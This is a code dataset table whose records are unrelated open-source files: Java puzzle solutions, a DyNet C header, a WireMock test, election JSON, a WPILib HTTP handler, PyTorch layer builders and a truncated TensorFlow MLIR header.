max_stars_count
int64
301
224k
text
stringlengths
6
1.05M
token_count
int64
3
727k
854
<gh_stars>100-1000 __________________________________________________________________________________________________ sample 1 ms submission class Solution { public int slidingPuzzle(int[][] board) { if (noSolution(board)) return -1; int target = 42792; // 123450 = 001 010 011 100 101 000 -> 42792 boolean[] hash = new boolean[181897]; // 543210 = 101 100 011 010 001 000 -> 181896 int start = 0; for (int[] line : board) { for (int c : line) { start = (start << 3) | c; } } if (start == target) return 0; int[][] move = new int[][] { { 1, 3 }, { 0, 2, 4 }, { 1, 5 }, { 0, 4 }, { 3, 1, 5 }, { 4, 2 } }; List<Integer> now = new ArrayList<>(); now.add(start); hash[start] = true; int step = 1; while (!now.isEmpty()) { List<Integer> next = new ArrayList<>(); for (int b : now) { int i = find0(b); for (int j : move[i]) { int nb = move(b, j, i); if (nb == target) return step; if (hash[nb]) continue; hash[nb] = true; next.add(nb); } } now = next; ++step; } return -1; } int find0(int b) { int i; for (i = 0; (b & 0x7) != 0; ++i) { b >>= 3; } return 5 - i; } int move(int b, int i, int j) { i = (5 - i) * 3; j = (5 - j) * 3; int ibit = (b >> i) & 0x7; return (b & ~(0x7 << i)) | (ibit << j); } boolean noSolution(int[][] board) { int count = 0; for (int x = 1; x < 6; ++x) { int val = board[x/3][x%3]; if (val == 0) continue; for (int y = 0; y < x; ++y) { if (board[y/3][y%3] > val) ++count; } } return (count & 1) == 1; } } __________________________________________________________________________________________________ sample 36548 kb submission class Solution { public int slidingPuzzle(int[][] board) { if (board == null || board.length == 0 || board[0].length == 0) return 0; String target = "123450"; String start = ""; int row = board.length; int col = board[0].length; for (int i = 0; i < row; i++) { for (int j = 0; j < col; j++) { start += board[i][j] + ""; } } Queue<String> que = new LinkedList<String>(); Set<String> set = new HashSet<String>(); que.offer(start); set.add(start); int steps = 0; int[] d = new int[] {1, -1, 3, -3}; while (que.size() > 0) { steps++; int size = que.size(); for (int s = 0; s < size; s++) { String cur = que.poll(); if (cur.equals(target)) return steps-1; int curPos = cur.indexOf("0"); for (int k = 0; k < 4; k++) { int nextPos = curPos + d[k]; if (isValid(board, curPos, nextPos)) { char[] ca = cur.toCharArray(); ca[curPos] = ca[nextPos]; ca[nextPos] = '0'; String next = new String(ca); if (!set.contains(next)) { que.offer(next); set.add(next); } } } } } return -1; } private boolean isValid(int[][] board, int cur, int next) { int row = board.length; int col = board[0].length; if (next >= 0 && next < row * col && !(cur == 2 && next == 3) && !(cur == 3 && next == 2)) return true; else return false; } } __________________________________________________________________________________________________
2,498
3,307
<filename>contrib/c/dynet_c/init.h #ifndef DYNET_C_INIT_H_ #define DYNET_C_INIT_H_ #include <dynet_c/define.h> /** * Opaque type of DynetParams. */ typedef struct dynetDynetParams dynetDynetParams_t; /** * Creates a new DynetParams object. * @param newobj Pointer to receive a handler. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetCreateDynetParams(dynetDynetParams_t **newobj); /** * Deletes the DynetParams object. * @param shape Pointer of a handler. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetDeleteDynetParams(dynetDynetParams_t *params); /** * Sets the seed for random number generation. * @param params Pointer of a handler. * @param random_seed Random seed. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetSetDynetParamsRandomSeed( dynetDynetParams_t *params, uint32_t random_seed); /** * Sets total memory to be allocated for DyNet. * @param params Pointer of a handler. * @param mem_descriptor Memory descriptor. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetSetDynetParamsMemDescriptor( dynetDynetParams_t *params, const char *mem_descriptor); /** * Sets weight decay rate for L2 regularization. * @param params Pointer of a handler. * @param weight_decay Weight decay rate. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetSetDynetParamsWeightDecay( dynetDynetParams_t *params, float weight_decay); /** * Specifies whether to autobatch or not. * @param params Pointer of a handler. * @param autobatch Whether to autobatch or not. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetSetDynetParamsAutobatch( dynetDynetParams_t *params, int32_t autobatch); /** * Specifies whether to show autobatch debug info or not. * @param params Pointer of a handler. * @param profiling Whether to show autobatch debug info or not. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetSetDynetParamsProfiling( dynetDynetParams_t *params, int32_t profiling); /** * Specifies whether to share parameters or not. * @param params Pointer of a handler. * @param shared_parameters Whether to share parameters or not. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetSetDynetParamsSharedParameters( dynetDynetParams_t *params, DYNET_C_BOOL shared_parameters); /** * Specifies the number of requested GPUs. * @param params Pointer of a handler. * @param requested_gpus Number of requested GPUs. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetSetDynetParamsRequestedGpus( dynetDynetParams_t *params, int32_t requested_gpus); /** * Builds a DynetParams object from command line arguments. * @param argc Command line arguments count * @param argv Command line arguments vector * @param newobj Pointer to receive a handler. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetExtractDynetParams( int32_t argc, char **argv, DYNET_C_BOOL shared_parameters, dynetDynetParams_t **newobj); /** * Initializes DyNet. * @param params Pointer of a DynetParams. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetInitialize(dynetDynetParams_t *params); /** * Resets random number generators. * @param seed Random seed. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetResetRng(uint32_t seed); #endif // DYNET_C_INIT_H_
1,227
626
package org.jsmart.zerocode.core.zzignored.mocking; import com.github.tomakehurst.wiremock.client.WireMock; import com.github.tomakehurst.wiremock.junit.WireMockRule; import org.jboss.resteasy.client.ClientRequest; import org.jboss.resteasy.client.ClientResponse; import org.jboss.resteasy.client.core.executors.ApacheHttpClientExecutor; import org.junit.Rule; import org.junit.Test; import org.skyscreamer.jsonassert.JSONAssert; import static com.github.tomakehurst.wiremock.client.WireMock.aResponse; import static com.github.tomakehurst.wiremock.client.WireMock.givenThat; import static com.github.tomakehurst.wiremock.client.WireMock.urlEqualTo; import static javax.ws.rs.core.MediaType.APPLICATION_JSON; public class WireMockJsonContentTesting { @Rule public WireMockRule rule = new WireMockRule(9073); @Test public void bioViaJson() throws Exception{ String jsonBodyRequest = "{\n" + " \"id\": \"303021\",\n" + " \"names\": [\n" + " {\n" + " \"firstName\": \"You First\",\n" + " \"lastName\": \"Me Last\"\n" + " }\n" + " ]\n" + "}"; givenThat(WireMock.get(urlEqualTo("/identitymanagement-services/identitymanagement-services/person/internalHandle/person_id_009/biographics/default")) .willReturn(aResponse() .withStatus(200) .withHeader("Content-Type", APPLICATION_JSON) .withBody(jsonBodyRequest))); ApacheHttpClientExecutor httpClientExecutor = new ApacheHttpClientExecutor(); ClientRequest clientExecutor = httpClientExecutor.createRequest("http://localhost:9073/identitymanagement-services/identitymanagement-services/person/internalHandle/person_id_009/biographics/default"); clientExecutor.setHttpMethod("GET"); ClientResponse serverResponse = clientExecutor.execute(); final String respBodyAsString = (String)serverResponse.getEntity(String.class); JSONAssert.assertEquals(jsonBodyRequest, respBodyAsString, true); System.out.println("### bio response from mapping: \n" + respBodyAsString); } }
951
348
<reponame>chamberone/Leaflet.PixiOverlay<gh_stars>100-1000 {"nom":"Nandy","circ":"11ème circonscription","dpt":"Seine-et-Marne","inscrits":4098,"abs":2298,"votants":1800,"blancs":15,"nuls":8,"exp":1777,"res":[{"nuance":"SOC","nom":"M. <NAME>","voix":595},{"nuance":"REM","nom":"Mme <NAME>","voix":468},{"nuance":"FI","nom":"<NAME>","voix":275},{"nuance":"FN","nom":"<NAME>","voix":244},{"nuance":"LR","nom":"Mme <NAME>","voix":100},{"nuance":"ECO","nom":"M. <NAME>","voix":36},{"nuance":"DLF","nom":"Mme <NAME>","voix":25},{"nuance":"EXG","nom":"Mme <NAME>","voix":18},{"nuance":"DIV","nom":"Mme <NAME>","voix":16}]}
252
707
// Copyright (c) FIRST and other WPILib contributors. // Open Source Software; you can modify and/or share it under the terms of // the WPILib BSD license file in the root directory of this project. #include "HALSimHttpConnection.h" #include <uv.h> #include <string_view> #include <fmt/format.h> #include <wpi/MimeTypes.h> #include <wpi/SmallVector.h> #include <wpi/StringExtras.h> #include <wpi/UrlParser.h> #include <wpi/fs.h> #include <wpi/raw_istream.h> #include <wpi/raw_uv_ostream.h> #include <wpi/uv/Request.h> namespace uv = wpi::uv; using namespace wpilibws; bool HALSimHttpConnection::IsValidWsUpgrade(std::string_view protocol) { if (m_request.GetUrl() != m_server->GetServerUri()) { MySendError(404, "invalid websocket address"); return false; } return true; } void HALSimHttpConnection::ProcessWsUpgrade() { m_websocket->open.connect_extended([this](auto conn, auto) { conn.disconnect(); // one-shot if (!m_server->RegisterWebsocket(shared_from_this())) { Log(409); m_websocket->Fail(409, "Only a single simulation websocket is allowed"); return; } Log(200); m_isWsConnected = true; std::fputs("HALWebSim: websocket connected\n", stderr); }); // parse incoming JSON, dispatch to parent m_websocket->text.connect([this](auto msg, bool) { if (!m_isWsConnected) { return; } wpi::json j; try { j = wpi::json::parse(msg); } catch (const wpi::json::parse_error& e) { std::string err("JSON parse failed: "); err += e.what(); m_websocket->Fail(400, err); return; } m_server->OnNetValueChanged(j); }); m_websocket->closed.connect([this](uint16_t, auto) { // unset the global, allow another websocket to connect if (m_isWsConnected) { std::fputs("HALWebSim: websocket disconnected\n", stderr); m_isWsConnected = false; m_server->CloseWebsocket(shared_from_this()); } }); } void HALSimHttpConnection::OnSimValueChanged(const wpi::json& msg) { // render json to buffers wpi::SmallVector<uv::Buffer, 4> sendBufs; wpi::raw_uv_ostream os{sendBufs, [this]() -> uv::Buffer { std::lock_guard lock(m_buffers_mutex); return m_buffers.Allocate(); }}; os << msg; // call the websocket send function on the uv loop m_server->GetExec().Send([self = shared_from_this(), sendBufs] { self->m_websocket->SendText(sendBufs, [self](auto bufs, wpi::uv::Error err) { { std::lock_guard lock(self->m_buffers_mutex); self->m_buffers.Release(bufs); } if (err) { fmt::print(stderr, "{}\n", err.str()); std::fflush(stderr); } }); }); } void HALSimHttpConnection::SendFileResponse(int code, std::string_view codeText, std::string_view contentType, std::string_view filename, std::string_view extraHeader) { std::error_code ec; // get file size auto size = fs::file_size(filename, ec); if (ec) { MySendError(404, "error getting file size"); return; } // open file wpi::raw_fd_istream is{filename, ec, true}; if (ec) { MySendError(404, "error opening file"); return; } wpi::SmallVector<uv::Buffer, 4> toSend; wpi::raw_uv_ostream os{toSend, 4096}; BuildHeader(os, code, codeText, contentType, size, extraHeader); SendData(os.bufs(), false); Log(code); // Read the file byte by byte wpi::SmallVector<uv::Buffer, 4> bodyData; wpi::raw_uv_ostream bodyOs{bodyData, 4096}; std::string fileBuf; size_t oldSize = 0; while (fileBuf.size() < size) { oldSize = fileBuf.size(); fileBuf.resize(oldSize + 1); is.read(&(*fileBuf.begin()) + oldSize, 1); } bodyOs << fileBuf; SendData(bodyOs.bufs(), false); if (!m_keepAlive) { m_stream.Close(); } } void HALSimHttpConnection::ProcessRequest() { wpi::UrlParser url{m_request.GetUrl(), m_request.GetMethod() == wpi::HTTP_CONNECT}; if (!url.IsValid()) { // failed to parse URL MySendError(400, "Invalid URL"); return; } std::string_view path; if (url.HasPath()) { path = url.GetPath(); } if (m_request.GetMethod() == wpi::HTTP_GET && wpi::starts_with(path, '/') && !wpi::contains(path, "..") && !wpi::contains(path, "//")) { // convert to fs native representation fs::path nativePath; if (wpi::starts_with(path, "/user/")) { nativePath = fs::path{m_server->GetWebrootSys()} / fs::path{wpi::drop_front(path, 6), fs::path::format::generic_format}; } else { nativePath = fs::path{m_server->GetWebrootSys()} / fs::path{wpi::drop_front(path, 1), fs::path::format::generic_format}; } if (fs::is_directory(nativePath)) { nativePath.append("index.html"); } if (!fs::exists(nativePath) || fs::is_directory(nativePath)) { MySendError(404, fmt::format("Resource '{}' not found", path)); } else { auto contentType = wpi::MimeTypeFromPath(nativePath.string()); SendFileResponse(200, "OK", contentType, nativePath.string()); } } else { MySendError(404, "Resource not found"); } } void HALSimHttpConnection::MySendError(int code, std::string_view message) { Log(code); SendError(code, message); } void HALSimHttpConnection::Log(int code) { auto method = wpi::http_method_str(m_request.GetMethod()); fmt::print(stderr, "{} {} HTTP/{}.{} {}\n", method, m_request.GetUrl(), m_request.GetMajor(), m_request.GetMinor(), code); }
2,708
348
<reponame>chamberone/Leaflet.PixiOverlay<gh_stars>100-1000 {"nom":"Monnières","circ":"3ème circonscription","dpt":"Jura","inscrits":347,"abs":160,"votants":187,"blancs":14,"nuls":5,"exp":168,"res":[{"nuance":"MDM","nom":"<NAME>","voix":93},{"nuance":"LR","nom":"<NAME>","voix":75}]}
117
965
<gh_stars>100-1000 void MyFunc() { CComObjectStack<CMyClass2> Tempobj; //... }
39
767
import torch.nn as nn import torch.nn.functional as F from custom_layers.flatten_layer import FlattenLayer from custom_layers.se_block import SEBlock class ConvBuilder(nn.Module): def __init__(self, base_config): super(ConvBuilder, self).__init__() print('ConvBuilder initialized.') self.BN_eps = 1e-5 self.BN_momentum = 0.1 self.BN_affine = True self.BN_track_running_stats = True self.base_config = base_config self.cur_conv_idx = -1 def set_BN_config(self, eps, momentum, affine, track_running_stats): self.BN_eps = eps self.BN_momentum = momentum self.BN_afine = affine self.BN_track_running_stats = track_running_stats def Conv2d(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros', use_original_conv=False): self.cur_conv_idx += 1 return nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=bias, padding_mode=padding_mode) # The running estimates are kept with a default momentum of 0.1. # By default, the elements of \gammaγ are sampled from \mathcal{U}(0, 1)U(0,1) and the elements of \betaβ are set to 0. # If track_running_stats is set to False, this layer then does not keep running estimates, and batch statistics are instead used during evaluation time as well. def BatchNorm2d(self, num_features, eps=None, momentum=None, affine=None, track_running_stats=None): if eps is None: eps = self.BN_eps if momentum is None: momentum = self.BN_momentum if affine is None: affine = self.BN_affine if track_running_stats is None: track_running_stats = self.BN_track_running_stats return nn.BatchNorm2d(num_features=num_features, eps=eps, momentum=momentum, affine=affine, track_running_stats=track_running_stats) def Sequential(self, *args): return nn.Sequential(*args) def ReLU(self): return nn.ReLU() def Conv2dBN(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, padding_mode='zeros', use_original_conv=False): conv_layer = self.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=False, padding_mode=padding_mode, use_original_conv=use_original_conv) bn_layer = self.BatchNorm2d(num_features=out_channels) se = self.Sequential() se.add_module('conv', conv_layer) se.add_module('bn', bn_layer) if self.base_config is not None and self.base_config.se_reduce_scale is not None and self.base_config.se_reduce_scale > 0 \ and (self.base_config.se_layers is None or self.cur_conv_idx in self.base_config.se_layers): print('%%%%%%%%%%% USE SEBLock !') se.add_module('se', SEBlock(input_channels=out_channels, internal_neurons=out_channels // self.base_config.se_reduce_scale)) return se def Conv2dBNReLU(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, padding_mode='zeros', use_original_conv=False): conv = self.Conv2dBN(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, padding_mode=padding_mode, use_original_conv=use_original_conv) conv.add_module('relu', self.ReLU()) return conv def ReLUConv2dBN(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, padding_mode='zeros', use_original_conv=False): conv_layer = self.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=False, padding_mode=padding_mode, use_original_conv=use_original_conv) bn_layer = self.BatchNorm2d(num_features=out_channels) se = self.Sequential() se.add_module('relu', self.ReLU()) se.add_module('conv', conv_layer) se.add_module('bn', bn_layer) return se def Conv2dReLU(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, padding_mode='zeros', bias=True, use_original_conv=False): conv = self.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, padding_mode=padding_mode, bias=bias, use_original_conv=use_original_conv) result = self.Sequential() result.add_module('conv', conv) result.add_module('relu', self.ReLU()) return conv def BNReLUConv2d(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, padding_mode='zeros', use_original_conv=False): bn_layer = self.BatchNorm2d(num_features=in_channels) conv_layer = self.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=False, padding_mode=padding_mode) se = self.Sequential() se.add_module('bn', bn_layer) se.add_module('relu', self.ReLU()) se.add_module('conv', conv_layer) return se def Linear(self, in_features, out_features, bias=True): return nn.Linear(in_features=in_features, out_features=out_features, bias=bias) def IntermediateLinear(self, in_features, out_features, bias=True): return nn.Linear(in_features=in_features, out_features=out_features, bias=bias) def Identity(self): return nn.Identity() def ResIdentity(self, num_channels): return nn.Identity() def ResNetAlignOpr(self, channels): return nn.Identity() def Dropout(self, keep_prob): return nn.Dropout(p=1-keep_prob) def Maxpool2d(self, kernel_size, stride=None, padding=0): return nn.MaxPool2d(kernel_size=kernel_size, stride=stride, padding=padding) def Avgpool2d(self, kernel_size, stride=None, padding=0): return nn.AvgPool2d(kernel_size=kernel_size, stride=stride, padding=padding) def Flatten(self): return FlattenLayer() def GAP(self, kernel_size): gap = nn.Sequential() gap.add_module('avg', self.Avgpool2d(kernel_size=kernel_size, stride=kernel_size)) gap.add_module('flatten', self.Flatten()) return gap def relu(self, in_features): return F.relu(in_features) def max_pool2d(self, in_features, kernel_size, stride, padding): return F.max_pool2d(in_features, kernel_size=kernel_size, stride=stride, padding=padding) def avg_pool2d(self, in_features, kernel_size, stride, padding): return F.avg_pool2d(in_features, kernel_size=kernel_size, stride=stride, padding=padding) def flatten(self, in_features): result = in_features.view(in_features.size(0), -1) return result def add(self, a, b): return a + b def GroupNorm(self, num_features, affine=True): return nn.GroupNorm(num_groups=8, num_channels=num_features, affine=affine) def Conv2dGroupNorm(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, padding_mode='zeros', use_original_conv=True): assert use_original_conv conv_layer = self.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=False, padding_mode=padding_mode) gn_layer = self.GroupNorm(out_channels) se = self.Sequential() se.add_module('conv', conv_layer) se.add_module('bn', gn_layer) return se def OriginConv2dBN(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, padding_mode='zeros'): conv_layer = nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=False, padding_mode=padding_mode) bn_layer = self.BatchNorm2d(num_features=out_channels) se = self.Sequential() se.add_module('conv', conv_layer) se.add_module('bn', bn_layer) return se
3,990
345
import os import unittest from programy.utils.files.filewriter import ContentFileWriter from programy.utils.files.filewriter import FileWriterConfiguration from programytest.utils.files.utils import get_os_specific_path class ContentFileWriterTests(unittest.TestCase): def test_init(self): config = FileWriterConfiguration(filename="filename.test", fileformat="txt", mode="a", encoding="utf-8", delete_on_start=False) writer = ContentFileWriter(config, content_type="txt") self.assertIsNotNone(writer) writer.display_debug_info() if os.path.exists("filename.test"): os.remove("filename.test") self.assertFalse(os.path.exists("filename.test"))
251
388
/* Copyright 2019 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ==============================================================================*/ #ifndef TENSORFLOW_COMPILER_MLIR_XLA_TRANSFORMS_MAP_XLA_TO_SCALAR_OP_H_ #define TENSORFLOW_COMPILER_MLIR_XLA_TRANSFORMS_MAP_XLA_TO_SCALAR_OP_H_ #include "llvm/ADT/StringRef.h" #include "llvm/ADT/StringSwitch.h" #include "mlir/Dialect/StandardOps/IR/Ops.h" // TF:llvm-project #include "tensorflow/compiler/mlir/xla/ir/hlo_ops.h" #include "tensorflow/compiler/mlir/xla/ir/lhlo_ops.h" namespace mlir { namespace xla_lhlo { template <typename LHLO_BinaryOp> struct ScalarOp; template <> struct ScalarOp<xla_lhlo::AddOp> { using FOp = ::mlir::AddFOp; using IOp = ::mlir::AddIOp; }; template <> struct ScalarOp<xla_hlo::AddOp> { using FOp = ::mlir::AddFOp; using IOp = ::mlir::AddIOp; }; template <> struct ScalarOp<xla_lhlo::CompareOp> { using FOp = ::mlir::CmpFOp; using IOp = ::mlir::CmpIOp; }; template <> struct ScalarOp<xla_hlo::CompareOp> { using FOp = ::mlir::CmpFOp; using IOp = ::mlir::CmpIOp; }; template <> struct ScalarOp<xla_lhlo::DivOp> { using FOp = ::mlir::DivFOp; using IOp = ::mlir::SignedDivIOp; }; template <> struct ScalarOp<xla_hlo::DivOp> { using FOp = ::mlir::DivFOp; using IOp = ::mlir::SignedDivIOp; }; template <> struct ScalarOp<xla_lhlo::MulOp> { using FOp = ::mlir::MulFOp; using IOp = ::mlir::MulIOp; }; template <> struct ScalarOp<xla_hlo::MulOp> { using FOp = ::mlir::MulFOp; using IOp = ::mlir::MulIOp; }; template <> struct ScalarOp<xla_lhlo::RemOp> { using FOp = ::mlir::RemFOp; using IOp = ::mlir::SignedRemIOp; }; template <> struct ScalarOp<xla_hlo::RemOp> { using FOp = ::mlir::RemFOp; using IOp = ::mlir::SignedRemIOp; }; template <> struct ScalarOp<xla_lhlo::SubOp> { using FOp = ::mlir::SubFOp; using IOp = ::mlir::SubIOp; }; template <> struct ScalarOp<xla_hlo::SubOp> { using FOp = ::mlir::SubFOp; using IOp = ::mlir::SubIOp; }; template <typename XLA_BinaryOp> using ScalarFOp = typename ScalarOp<XLA_BinaryOp>::FOp; template <typename XLA_BinaryOp> using ScalarIOp = typename ScalarOp<XLA_BinaryOp>::IOp; template <typename... Args> struct MapXlaOpToStdScalarOpImpl { Value operator()(Location loc, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return nullptr; } }; template <typename StdScalarOp> struct MapXlaOpToStdScalarOpImpl<StdScalarOp> { Value operator()(Location loc, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return b->template create<StdScalarOp>(loc, result_types, args, mlir::None); } }; template <typename SupportedType, typename StdScalarOp, typename... Args> struct MapXlaOpToStdScalarOpImpl<SupportedType, StdScalarOp, Args...> { Value operator()(Location loc, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { Type element_type = args.front().getType(); if (element_type.isa<SupportedType>()) { return b->template create<StdScalarOp>(loc, result_types, args, mlir::None); } return MapXlaOpToStdScalarOpImpl<Args...>{}(loc, result_types, args, b); } }; template <typename XlaOp> inline Value MapXlaOpToStdScalarOp(XlaOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<IntegerType, ScalarIOp<XlaOp>, FloatType, ScalarFOp<XlaOp>>{}(xla_op.getLoc(), result_types, args, b); } // TODO(ravishankarm): Find a way to reduce code-bloat in HLO and LHLO // specialization. template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::AbsOp>(xla_lhlo::AbsOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::AbsFOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::AbsOp>(xla_hlo::AbsOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::AbsFOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::AndOp>(xla_lhlo::AndOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<IntegerType, ::mlir::AndOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::AndOp>(xla_hlo::AndOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<IntegerType, ::mlir::AndOp>{}( xla_op.getLoc(), result_types, args, b); } template <typename PredicateType> inline Optional<PredicateType> getCmpPredicate( StringRef xla_comparison_direction) { return llvm::None; } template <> inline Optional<CmpFPredicate> getCmpPredicate<CmpFPredicate>( StringRef xla_comparison_direction) { return llvm::StringSwitch<CmpFPredicate>(xla_comparison_direction) .Case("EQ", CmpFPredicate::OEQ) .Case("NE", CmpFPredicate::ONE) .Case("GE", CmpFPredicate::OGE) .Case("GT", CmpFPredicate::OGT) .Case("LE", CmpFPredicate::OLE) .Case("LT", CmpFPredicate::OLT) .Default(CmpFPredicate::NumPredicates); } template <> inline Optional<CmpIPredicate> getCmpPredicate<CmpIPredicate>( StringRef xla_comparison_direction) { return llvm::StringSwitch<Optional<CmpIPredicate>>(xla_comparison_direction) .Case("EQ", CmpIPredicate::eq) .Case("NE", CmpIPredicate::ne) .Case("GE", CmpIPredicate::sge) .Case("GT", CmpIPredicate::sgt) .Case("LE", CmpIPredicate::sle) .Case("LT", CmpIPredicate::slt) .Default(llvm::None); } template <typename XLACompareOpTy> inline Value MapXlaCompareOpToStdScalarOp(XLACompareOpTy xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { const auto& lhs = args[0]; const auto& rhs = args[1]; Type element_type = lhs.getType(); if (element_type.isSignlessInteger()) { Optional<CmpIPredicate> predicate = getCmpPredicate<CmpIPredicate>(xla_op.comparison_direction()); assert(predicate.hasValue() && "expected valid comparison direction"); return b->create<ScalarIOp<XLACompareOpTy>>(xla_op.getLoc(), predicate.getValue(), lhs, rhs); } if (element_type.isa<FloatType>()) { Optional<CmpFPredicate> predicate = getCmpPredicate<CmpFPredicate>(xla_op.comparison_direction()); assert(predicate.hasValue() && "expected valid comparison direction"); return b->create<ScalarFOp<XLACompareOpTy>>(xla_op.getLoc(), predicate.getValue(), lhs, rhs); } return nullptr; } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::CompareOp>( xla_lhlo::CompareOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaCompareOpToStdScalarOp<xla_lhlo::CompareOp>(xla_op, result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::CompareOp>( xla_hlo::CompareOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaCompareOpToStdScalarOp<xla_hlo::CompareOp>(xla_op, result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::CopyOp>( xla_lhlo::CopyOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return args.front(); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::CopyOp>(xla_hlo::CopyOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return args.front(); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::ExpOp>(xla_lhlo::ExpOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::ExpOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::ExpOp>(xla_hlo::ExpOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::ExpOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::CeilOp>( xla_lhlo::CeilOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::CeilFOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::CeilOp>(xla_hlo::CeilOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::CeilFOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::ConvertOp>( xla_lhlo::ConvertOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { Type sourceType = args.front().getType(); Type targetType = result_types.front(); if (mlir::SIToFPOp::areCastCompatible(sourceType, targetType)) { return b->create<mlir::SIToFPOp>(xla_op.getLoc(), result_types, args, mlir::None); } else if (sourceType.isa<FloatType>() && targetType.isa<FloatType>()) { FloatType src = sourceType.cast<FloatType>(); FloatType res = targetType.cast<FloatType>(); if (src.getWidth() > res.getWidth()) { return b->create<mlir::FPTruncOp>(xla_op.getLoc(), result_types, args, mlir::None); } else if (src.getWidth() < res.getWidth()) { return b->create<mlir::FPExtOp>(xla_op.getLoc(), result_types, args, mlir::None); } // No conversion is needed for the same width floats return args.front(); } if (sourceType.isSignlessInteger() && targetType.isSignlessInteger()) { IntegerType src = sourceType.cast<IntegerType>(); IntegerType res = targetType.cast<IntegerType>(); if (src.getWidth() > res.getWidth()) { return b->create<mlir::TruncateIOp>(xla_op.getLoc(), result_types, args, mlir::None); } else if (src.getWidth() < res.getWidth()) { return 